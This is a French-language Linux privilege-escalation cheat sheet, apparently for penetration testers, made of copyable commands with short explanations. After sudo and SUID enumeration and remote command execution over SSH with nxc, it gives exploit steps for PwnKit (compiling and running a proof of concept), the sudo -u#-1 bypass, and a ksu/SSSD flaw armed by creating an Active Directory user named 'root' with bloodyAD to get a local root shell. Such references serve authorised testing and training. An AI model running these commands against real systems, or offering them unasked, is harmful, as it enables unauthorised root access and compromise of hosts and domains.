Privesc Linux

Sudo / SUID

Copy command
sudo -l

Description: Identifier les commandes sudo exécutables sans mot de passe.

Copy command
find / -perm -4000 -type f 2>/dev/null

Description: Lister les binaires SUID exploitables.

Copy command
nxc ssh $TARGET -u $USER -p $PASS -x 'sudo -l'

Description: Collecte distante sudoers via SSH validé.

Copy command
nxc ssh $TARGET -u $USER -p $PASS -x 'id && whoami && hostname'

Description: Contexte identité avant tentative d'escalade.

Copy command
pkexec --version # policykit-1 < 0.105-33 = vulnérable

Description: PwnKit (CVE-2021-4034) : pkexec est SUID par défaut sur la quasi-totalité des distros, root direct sans mot de passe si la version est vulnérable.

Copy command
gcc pwnkit.c -o pwnkit_exploit && ./pwnkit_exploit  # PoC arthepsy

Description: Exploitation PwnKit : dépose un binaire SUID (ex: /tmp/rootbash) exploitable ensuite avec -p.

Copy command
sudo -u#-1 /bin/bash

Description: CVE-2019-14287 (sudo < 1.8.28) : une règle sudoers (ALL, !root) est contournable, l'UID -1 (ou 4294967295) est mal interprété et exécute en root malgré l'exclusion explicite.

Copy command
ls -la /usr/bin/ksu.mit  # -rwsr-xr-x root root

Description: CVE-2025-11561 : sur un hôte Linux joint à l'AD (SSSD) avec ksu (MIT Kerberos) en SUID, l'autorisation fait un fallback par correspondance de NOM entre le principal Kerberos et l'utilisateur cible. Un principal AD littéralement nommé 'root' est alors autorisé à devenir l'utilisateur local root.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add user root '$PASS' --ou '$OU_AVEC_CREATE_CHILD'

Description: Si on a CREATE_CHILD sur une OU quelconque, créer un utilisateur AD nommé 'root' suffit à armer l'exploit : kinit root@DOMAIN puis ksu root -n root@DOMAIN donne un shell root local. Piège : ksu -e <cmd> échoue souvent (cmd_path restreint) — lancer le shell interactif et envoyer les commandes sur stdin.